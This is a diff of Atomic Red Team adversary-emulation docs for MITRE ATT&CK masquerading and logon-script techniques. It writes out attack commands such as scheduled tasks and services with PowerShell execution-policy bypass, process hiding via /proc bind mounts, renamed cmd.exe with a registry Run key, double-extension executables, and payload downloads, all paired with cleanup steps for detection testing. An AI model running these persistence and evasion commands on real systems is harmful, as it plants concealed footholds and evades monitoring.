-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
 schtasks /query /tn win32times
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 schtasks /tn win32times /delete /f
 ```
+### Atomic Test #2: Creating W32Time similar named service using sc

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Creating W32Time similar named service using sc
 Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao"

 **Supported Platforms:** Windows

+**auto_generated_guid:** `b721c6ef-472c-4263-a0d9-37f1f4ecff66`

-**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
 sc qc win32times
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 sc delete win32times
 ```
+### Atomic Test #3: linux rename /proc/pid/comm using prctl

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - linux rename /proc/pid/comm using prctl
 Runs a C program that calls prctl(PR_SET_NAME) to modify /proc/pid/comm value to "totally_legit".  This will show up as process name in simple 'ps' listings.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `f0e3aaea-5cd9-4db6-a077-631dd19b27a8`

-**auto_generated_guid:** f0e3aaea-5cd9-4db6-a077-631dd19b27a8
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_path | Output Binary Path | path | /tmp/T1036_004_prctl_rename|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 #{exe_path} & ps
@@ -115,45 +78,37 @@ if [ -z "${TMP}" ] ; then echo "renamed process NOT FOUND in process list" && ex
 exit 0
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f #{exe_path}
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: #{exe_path} must be exist on system.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 stat #{exe_path}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 cc -o #{exe_path} PathToAtomicsFolder/T1036.004/src/prctl_rename.c
 ```

+### Atomic Test #4: Hiding a malicious process with bind mounts

-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Hiding a malicious process with bind mounts
 Creates a malicious process and hides it by bind mounting to the /proc filesystem of a benign process

 **Supported Platforms:** Linux

+**auto_generated_guid:** `ad4b73c2-d6e2-4d8b-9868-4c6f55906e01`

-**auto_generated_guid:** ad4b73c2-d6e2-4d8b-9868-4c6f55906e01
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 eval '(while true; do :; done) &'
@@ -162,14 +117,9 @@ random_kernel_pid=$(ps -ef | grep "\[.*\]" | awk '{print $2}' | shuf -n 1)
 sudo mount -B /proc/$random_kernel_pid /proc/$(cat /tmp/evil_pid.txt)
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 kill $(cat /tmp/evil_pid.txt) || echo "Failed to kill PID $evil_pid"
 rm /tmp/evil_pid.txt
 ```
-
-
-
-
-
-<br/>
@@ -1,44 +1,34 @@
 # T1036.005 - Masquerading: Match Legitimate Name or Location
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005)
-<blockquote>

-Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation. 
+## Description from ATT&CK

-This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023)
+> Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation.
+> 
+> This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023)

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1036/005)

 ## Atomic Tests

- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
+- [Atomic Test #1: Execute a process from a directory masquerading as the current parent directory](#atomic-test-1-execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
+- [Atomic Test #2: Masquerade as a built-in system executable](#atomic-test-2-masquerade-as-a-built-in-system-executable)
+- [Atomic Test #3: Masquerading cmd.exe as VEDetector.exe](#atomic-test-3-masquerading-cmdexe-as-vedetectorexe)

- [Atomic Test #2 - Masquerade as a built-in system executable](#atomic-test-2---masquerade-as-a-built-in-system-executable)
+### Atomic Test #1: Execute a process from a directory masquerading as the current parent directory

- [Atomic Test #3 - Masquerading cmd.exe as VEDetector.exe](#atomic-test-3---masquerading-cmdexe-as-vedetectorexe)
-
-
-<br/>
-
-## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory
 Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)

 **Supported Platforms:** macOS, Linux

+**auto_generated_guid:** `812c3ab8-94b0-4698-a9bf-9420af23ce24`

-**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | test_message | Test message to echo out to the screen | string | Hello from the Atomic Red Team test T1036.005#1|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 mkdir $HOME/...
@@ -46,39 +36,27 @@ cp $(which sh) $HOME/...
 $HOME/.../sh -c "echo #{test_message}"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f $HOME/.../sh
 rmdir $HOME/.../
 ```
+### Atomic Test #2: Masquerade as a built-in system executable

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Masquerade as a built-in system executable
 Launch an executable that attempts to masquerade as a legitimate executable.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `35eb8d16-9820-4423-a2a1-90c4f5edd9ca`

-**auto_generated_guid:** 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | executable_filepath | File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. | string | $Env:windir&#92;Temp&#92;svchost.exe|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Add-Type -TypeDefinition @'
@@ -92,19 +70,13 @@ public class Test {
 Start-Process -FilePath "#{executable_filepath}"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
 ```
+### Atomic Test #3: Masquerading cmd.exe as VEDetector.exe

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Masquerading cmd.exe as VEDetector.exe
 This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application.
 The test copies cmd.exe, renames it to VEDetector.exe, adds a registry run key for persistence, and executes the renamed binary.
 This technique may be used to evade detection by mimicking legitimate software names or locations.
@@ -120,22 +92,16 @@ This technique may be used to evade detection by mimicking legitimate software n

 **Supported Platforms:** Windows

+**auto_generated_guid:** `03ae82a6-9fa0-465b-91df-124d8ca5c4e8`

-**auto_generated_guid:** 03ae82a6-9fa0-465b-91df-124d8ca5c4e8
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ved_path | Directory path where VEDetector.exe will be created | Path | $env:TEMP|
 | source_file | Path to the source cmd.exe file | Path | $env:SystemRoot&#92;System32&#92;cmd.exe|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 # Copy and rename cmd.exe to VEDetector.exe
@@ -150,7 +116,8 @@ Start-Process -FilePath "#{ved_path}\VEDetector.exe"
 Start-Sleep -Seconds 5
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 # Remove registry key
 Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -ErrorAction SilentlyContinue
@@ -164,21 +131,20 @@ Remove-Item -Path "#{ved_path}\VEDetector.exe" -Force -ErrorAction SilentlyConti
 Write-Host "[+] Cleaned up VEDetector artifacts"
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: The source cmd.exe file must exist on the system.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{source_file}") { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Write-Host "[-] Source file not found: #{source_file}. Ensure cmd.exe exists in the specified path."
 exit 1
 ```

-
-
-
-<br/>
@@ -1,37 +1,29 @@
 # T1036.006 - Masquerading: Space after Filename
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/006)
-<blockquote>

-Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
+## Description from ATT&CK

-For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
+> Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
+> 
+> For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
+> 
+> Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

-Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1036/006)

 ## Atomic Tests

- [Atomic Test #1 - Space After Filename (Manual)](#atomic-test-1---space-after-filename-manual)
+- [Atomic Test #1: Space After Filename (Manual)](#atomic-test-1-space-after-filename-manual)
+- [Atomic Test #2: Space After Filename](#atomic-test-2-space-after-filename)

- [Atomic Test #2 - Space After Filename](#atomic-test-2---space-after-filename)
+### Atomic Test #1: Space After Filename (Manual)

-
-<br/>
-
-## Atomic Test #1 - Space After Filename (Manual)
 Space After Filename

 **Supported Platforms:** macOS

+**auto_generated_guid:** `89a7dd26-e510-4c9f-9b15-f3bae333360f`

-**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f
-
-
-
-
-
-#### Run it with these steps! 
+#### Attack Commands: Run it with these steps! 
 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt

 2. mv execute.txt "execute.txt "
@@ -39,29 +31,15 @@ Space After Filename
 3. ./execute.txt\ 


+### Atomic Test #2: Space After Filename

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Space After Filename
 Space after filename.

 **Supported Platforms:** macOS, Linux

+**auto_generated_guid:** `b95ce2eb-a093-4cd8-938d-5258cef656ea`

-**auto_generated_guid:** b95ce2eb-a093-4cd8-938d-5258cef656ea
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 mkdir -p /tmp/atomic-test-T1036.006
@@ -72,13 +50,8 @@ chmod +x 'testdirwithspaceend /init '
 './testdirwithspaceend /init '
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -rf /tmp/atomic-test-T1036.006
 ```
-
-
-
-
-
-<br/>
@@ -1,46 +1,38 @@
 # T1036.007 - Masquerading: Double File Extension
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/007)
-<blockquote>

-Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) 
+## Description from ATT&CK

-Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)
+> Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension)
+> 
+> Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)
+> 
+> Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.

-Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1036/007)

 ## Atomic Tests

- [Atomic Test #1 - File Extension Masquerading](#atomic-test-1---file-extension-masquerading)
+- [Atomic Test #1: File Extension Masquerading](#atomic-test-1-file-extension-masquerading)

+### Atomic Test #1: File Extension Masquerading

-<br/>
-
-## Atomic Test #1 - File Extension Masquerading
 download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.

 e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `c7fa0c3b-b57f-4cba-9118-863bf4e653fc`

-**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_path | path to exe to use when creating masquerading files | path | C:&#92;Windows&#92;System32&#92;calc.exe|
 | vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder&#92;T1036.007&#92;src&#92;T1036.007_masquerading.vbs|
 | ps1_path | path of powershell script to use when creating masquerading files | path | PathToAtomicsFolder&#92;T1036.007&#92;src&#92;T1036.007_masquerading.ps1|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y
@@ -63,7 +55,8 @@ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.rtf.ps1
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del /f %temp%\T1036.007_masquerading.docx.exe > nul 2>&1
 del /f %temp%\T1036.007_masquerading.pdf.exe > nul 2>&1
@@ -76,31 +69,35 @@ del /f %temp%\T1036.007_masquerading.pdf.ps1 > nul 2>&1
 del /f %temp%\T1036.007_masquerading.rtf.ps1 > nul 2>&1
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: File to copy must exist on disk at specified location (#{vbs_path})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{vbs_path}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "#{vbs_path}") -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.007/src/T1036.007_masquerading.vbs" -OutFile "#{vbs_path}"
 ```
+
 ##### Description: File to copy must exist on disk at specified location (#{ps1_path})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{ps1_path}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "#{ps1_path}") -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.007/src/T1036.007_masquerading.ps1" -OutFile "#{ps1_path}"
 ```

-
-
-
-<br/>
@@ -1,37 +1,27 @@
 # T1036 - Masquerading
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036)
-<blockquote>

-Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
+## Description from ATT&CK

-Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
+> Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
+> 
+> Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1036)

 ## Atomic Tests

- [Atomic Test #1 - System File Copied to Unusual Location](#atomic-test-1---system-file-copied-to-unusual-location)
+- [Atomic Test #1: System File Copied to Unusual Location](#atomic-test-1-system-file-copied-to-unusual-location)
+- [Atomic Test #2: Malware Masquerading and Execution from Zip File](#atomic-test-2-malware-masquerading-and-execution-from-zip-file)

- [Atomic Test #2 - Malware Masquerading and Execution from Zip File](#atomic-test-2---malware-masquerading-and-execution-from-zip-file)
+### Atomic Test #1: System File Copied to Unusual Location

-
-<br/>
-
-## Atomic Test #1 - System File Copied to Unusual Location
 It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `51005ac7-52e2-45e0-bdab-d17c6d4916cd`

-**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
@@ -40,38 +30,26 @@ sleep -s 5
 stop-process -name "cmd" | out-null
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue
 ```
+### Atomic Test #2: Malware Masquerading and Execution from Zip File

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Malware Masquerading and Execution from Zip File
 When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `4449c89b-ec82-43a4-89c1-91e2f1abeecc`

-**auto_generated_guid:** 4449c89b-ec82-43a4-89c1-91e2f1abeecc
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | Location of zip file | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
@@ -79,27 +57,27 @@ cd "$env:userprofile\Downloads\T1036"
 cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 taskkill /IM Calculator.exe /f >$null 2>$null
 Remove-Item "$env:userprofile\Downloads\T1036" -recurse -ErrorAction Ignore
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Zip file must be present.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
 Invoke-WebRequest #{url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip"
 ```

-
-
-
-<br/>
@@ -1,57 +1,44 @@
 # T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/001)
-<blockquote>

-Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)
+## Description from ATT&CK

-Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 
+> Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)
+> 
+> Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1037/001)

 ## Atomic Tests

- [Atomic Test #1 - Logon Scripts](#atomic-test-1---logon-scripts)
+- [Atomic Test #1: Logon Scripts](#atomic-test-1-logon-scripts)

+### Atomic Test #1: Logon Scripts

-<br/>
-
-## Atomic Test #1 - Logon Scripts
 Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
 that can be viewed in the Registry Editor.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `d6042746-07d4-4c92-9ad8-e644c114a231`

-**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_path | Path to .bat file | string | %temp%&#92;art.bat|
 | script_command | Command To Execute | string | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%&#92;desktop&#92;T1037.001-log.txt|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 echo "#{script_command}" > #{script_path}
 REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
 del #{script_path} >nul 2>&1
 del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1
 ```
-
-
-
-
-
-<br/>
@@ -1,35 +1,28 @@
 # T1037.002 - Boot or Logon Initialization Scripts: Logon Script (Mac)
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/002)
-<blockquote>

-Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) 
+## Description from ATT&CK

-Adversaries can add or insert a path to a malicious script in the <code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or <code>LogoutHook</code> key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
+> Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)
+> 
+> Adversaries can add or insert a path to a malicious script in the <code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or <code>LogoutHook</code> key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
+> 
+> **Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)

-**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) 
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1037/002)

 ## Atomic Tests

- [Atomic Test #1 - Logon Scripts - Mac](#atomic-test-1---logon-scripts---mac)
+- [Atomic Test #1: Logon Scripts - Mac](#atomic-test-1-logon-scripts---mac)

+### Atomic Test #1: Logon Scripts - Mac

-<br/>
-
-## Atomic Test #1 - Logon Scripts - Mac
 Mac logon script

 **Supported Platforms:** macOS

+**auto_generated_guid:** `f047c7de-a2d9-406e-a62b-12a09d9516f4`

-**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4
-
-
-
-
-
-#### Run it with these steps! 
+#### Attack Commands: Run it with these steps! 
 1. Create the required plist file

    sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
@@ -47,9 +40,3 @@ Mac logon script
 	  defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh


-
-
-
-
-
-<br/>
@@ -1,73 +1,48 @@
 # T1037.004 - Boot or Logon Initialization Scripts: Rc.common
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004)
-<blockquote>

-Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
+## Description from ATT&CK

-Adversaries may establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
+> Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
+> 
